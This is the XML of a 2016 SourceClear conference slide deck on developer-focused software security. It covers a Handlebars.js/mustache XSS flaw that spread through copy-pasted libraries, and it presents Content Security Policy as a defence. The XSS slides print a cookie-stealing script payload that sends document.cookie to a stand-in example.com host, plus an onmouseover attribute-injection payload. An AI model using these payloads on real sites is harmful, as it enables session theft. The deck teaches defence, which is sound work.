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60" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="272" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="269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8" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="283" r:id="rId29"/>
    <p:sldId id="289" r:id="rId30"/>
    <p:sldId id="25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400D1-A713-4941-B680-5DF707A8802B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14/2/16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BD374-C4F3-EB4D-B2AC-097FDD56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E5A7-88E5-4E44-A18E-315F98AEA821}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14/2/16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16585-F684-4449-8032-514DBEC6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51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79D5-0811-CC44-8CBE-1671A8A857D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A2D4-5B42-174E-B18F-1224B9EA1061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1057-CB80-EA41-9441-E90EA86E0480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E85-3A0C-9B44-A6BC-354E6102C66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079F-68F4-784F-8108-76D5E161F140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B6A-29BD-F746-B5BD-17192FE89B2C}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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9476-C93C-4A42-9066-4DC7DE865DFC}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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2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5F14-D2C9-704D-86E2-17339885B1FE}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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8E18-2CF8-D845-AC5E-35A032BF37F4}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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EA2-70E2-3F4C-B3A2-965C2FC1C38E}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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8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6C32-2496-B046-B0EA-5982379080B3}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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77C2-4DF8-DE47-9657-E0563FA121CB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7B48-258B-D64F-BED4-36253E55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rcclr.com/catalog/vulnerabilities/187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srcclr.com/handlebars-findings-followu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log.srcclr.com/http-secure-headers-in-plain-english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*.foo.com" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://store.foo.co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asankhay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Developer-focused Software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Asankhaya Sharma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Director of R&amp;D</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SourceClear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9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9EF2-2715-4441-848F-F0DDE4D9D1BD}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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8989-1132-FD45-B170-1F40C0E920D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Screen Shot 2015-07-10 at 7.3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91" y="428445"/>
            <a:ext cx="6918800" cy="5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BEA-D8A6-7D49-941F-82D2DE3A99C1}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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8989-1132-FD45-B170-1F40C0E920D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Screen Shot 2015-07-10 at 7.4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33" y="657971"/>
            <a:ext cx="5572131" cy="492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70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3917-D500-9341-AACF-88C9E1152888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difference-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6" y="355912"/>
            <a:ext cx="7531100" cy="58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7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Copy-paste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19464" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Handlebars.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> before 4.0.0 and mustache before 2.2.1 does not properly escape attribute values with the equals sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows cross-site scripting through unquoted variables being placed into HTML attributes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1AE0-7B6F-3D4E-B241-5D135FDB9338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headshot-vaness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97" y="1748345"/>
            <a:ext cx="1875079" cy="18750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1105" y="3798187"/>
            <a:ext cx="1875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Vanessa Henderson</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Security Researcher @ SRC:CLR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051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injection, in which malicious scripts are injected into otherwise benign and trusted web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different types of XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM based XSS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F3F1-27FF-E44A-A052-0162D289AA21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31747"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2217703"/>
          <a:ext cx="8229600" cy="2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Malicious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&lt;input value=“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" i="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>userInput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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&gt;&lt;script&gt;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window.location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='http://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example.com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/?cookie='+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document.cookie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&lt;/script&gt;&lt;input value=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&lt;input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value=“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effectLst/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;script&gt;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window.location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='http://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example.com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/?cookie='+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document.cookie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effectLst/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;input value=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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1EF4-73C2-2C45-9500-3ADB68451BD1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0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Handlebars.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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oes not properly escape attribute values with the equals sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>XSS via unquoted variables placed into HTML attributes using handlebars substitution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href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={{foo}}&gt;Click me!&lt;/a&gt;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4EA9-5C90-8E4A-9040-6C228C178259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71863"/>
            <a:ext cx="2667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4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Handlebars.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> XSS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52D4-A792-B845-86E8-46FCE462792D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366297"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2217703"/>
          <a:ext cx="8229600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HTML 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Malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline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&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>href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={{foo}}&gt;Click me!&lt;/a&gt;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www.example.com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=alert('HA!')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&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>href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src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www.example.com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onmouseover</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>=alert(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dirty="0" smtClean="0"/>
                        <a:t>HA!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dirty="0" smtClean="0"/>
                        <a:t>)&gt; Click me!&lt;/a&gt;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7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PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Technical write up - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://srcclr.com/catalog/vulnerabilities/1878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8E6-0D75-8B48-8C30-F78D6BEA17EB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8C10-A046-814D-94F1-AADA69FBA82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5" y="1677433"/>
            <a:ext cx="8805555" cy="4205560"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21379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nderstanding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>the role that software plays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>In providing security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
              </a:rPr>
              <a:t>As source of insecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus on how to build secure software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principles and methods to make software more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threats and vulnerabilities and how to avoid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F7DE-3554-994F-ADC4-C33F794558DD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Widespread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Developers copy-pasted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handlebars.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file in their library or application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The vulnerable code in their project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found in other Ruby and Java libraries as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We identified over 37 libraries that have over 40,000 downloads that were affected by the same issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For details check out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.srcclr.com/handlebars-findings-followup/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AE3A2-979D-6C47-8D10-971E8802E200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such issues?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with what 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 and libraries you include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Audit the library usage regularly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implement a content security policy (CSP) for your web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B1B0-CBC3-954A-9D91-58FA698D4937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Security Policy (CSP)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whitelisting mechanism that allows you to declare what behavior is allowed on a given page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSP allows you to specify the sources from which the page is allowed to load resources like scripts, fonts, styles, images, forms etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An additional layer of defense against XSS, click jacking and other code injection attacks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96B5-920C-0E4C-9CFA-5E16293EF226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default-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cript-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tyle-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font-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mg-src</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read more details on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.srcclr.com/http-secure-headers-in-plain-english/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E85-3A0C-9B44-A6BC-354E6102C66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lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://*.foo.com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https://store.foo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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`none`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>`self`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>`unsafe-inline`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>`unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>`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E85-3A0C-9B44-A6BC-354E6102C66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dirty="0" err="1" smtClean="0"/>
              <a:t>srcclr.com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E85-3A0C-9B44-A6BC-354E6102C66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 descr="Screen Shot 2016-02-16 at 12.4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" y="1316550"/>
            <a:ext cx="9144000" cy="50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twitter.com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E85-3A0C-9B44-A6BC-354E6102C66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2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E85-3A0C-9B44-A6BC-354E6102C66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Screen Shot 2016-02-16 at 12.4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Older browsers do not implement CSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent access to your site when someone visits from an old browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You need to be careful what domains you whitelist </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you allow a domain that is compromised it will again expose your site to attacks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B9A5-8F77-8B40-8F88-87C072360ECE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development landscape has changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DevOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Agile, CI, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open-source code is prevalent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Up top 90% of code is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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reusable code = reusable vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A XSS in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Handlebars.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> found in 40+ libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developer-focused security practices can help build software safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using secure HTTP headers like CSP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5E85-3A0C-9B44-A6BC-354E6102C66C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Firewalls, anti-virus and end-point security solutions are good for building walls around a perimeter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers can often bypass the perimeter (BYOD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software security aims to address the weakness directly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B86E-6FCD-7B40-9CA5-F760C52D09BE}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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8989-1132-FD45-B170-1F40C0E920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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@asankhaya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F0BB0-FF6F-4348-83BF-0F65A8BAE3AD}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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72C2-14F3-D347-8889-77B984C2D17B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Developer-focused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in the Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>upply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open-source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Package mangers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Build systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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BD77-9B6D-8F47-852D-E5E6C6EAE6F6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7D2BD-684C-5B4A-83CB-698206DD6044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90" y="5339187"/>
            <a:ext cx="2901607" cy="6405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6" y="1607990"/>
            <a:ext cx="1797291" cy="1386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12" y="2071718"/>
            <a:ext cx="20193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78" y="3250544"/>
            <a:ext cx="5778500" cy="72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1" y="5192301"/>
            <a:ext cx="2501900" cy="78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46" y="2178477"/>
            <a:ext cx="160020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90" y="4239801"/>
            <a:ext cx="1651000" cy="50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4087401"/>
            <a:ext cx="2501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7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third-party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creating applications from scratch, today’s developers start with open-source components and then copy, extend, and glue them together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It means that open-source libraries and frameworks now make up the vast majority of the source code used by companies today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3831-BFD9-0544-89C9-C36A4C0912C9}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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63FE-8D34-A647-A337-CDBF9A9898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2788-AE7C-8E4C-85F0-2643AED9A147}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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7B48-258B-D64F-BED4-36253E55270B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1968500"/>
            <a:ext cx="1790700" cy="3136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5105400"/>
            <a:ext cx="17907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Code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5143500" y="1968500"/>
            <a:ext cx="241300" cy="3136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05450" y="332520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80 %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143500" y="5105400"/>
            <a:ext cx="241300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05450" y="528351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0 %</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405294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Reusable Components = Reusable Vulnerabilities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Attackers are increasingly targeting popular libraries and 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components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploiting a library can potentially exploit many applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traditional security analysis is focused on custom code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Up to 90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>% of the attack surface of an application may be due to 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party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86A7-9726-DE47-9729-CB811CD564E6}" type="datetime5">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>16-Feb-16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63FE-8D34-A647-A337-CDBF9A9898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</TotalTime>
  <Words>914</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>182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Developer-focused Software Security</vt:lpstr>
      <vt:lpstr>What is Software Security?</vt:lpstr>
      <vt:lpstr>Why Software Security?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Developer-focused</vt:lpstr>
      <vt:lpstr>Libraries and components</vt:lpstr>
      <vt:lpstr>Use of third-party libraries</vt:lpstr>
      <vt:lpstr>Typical application</vt:lpstr>
      <vt:lpstr>Reusable Components = Reusable Vulnerabilities </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Copy-paste vulnerabilities</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS) </vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Handlebars.js XSS</vt:lpstr>
      <vt:lpstr>Handlebars.js XSS</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>The fix</vt:lpstr>
      <vt:lpstr>Widespread Impact</vt:lpstr>
      <vt:lpstr>How to prevent such issues?</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>CSP</vt:lpstr>
      <vt:lpstr>Content sources</vt:lpstr>
      <vt:lpstr>Example 1: srcclr.com</vt:lpstr>
      <vt:lpstr>Example 2: twitter.com</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Caveats</vt:lpstr>
      <vt:lpstr>Takeaways </vt:lpstr>
      <vt:lpstr>Thank you!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Open-Source Security</dc:title>
  <dc:creator>Asankhaya Sharma</dc:creator>
  <cp:lastModifiedBy>Asankhaya Sharma</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-08T12:56:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-16T07:30:10Z</dcterms:modified>
</cp:coreProperties>
</file>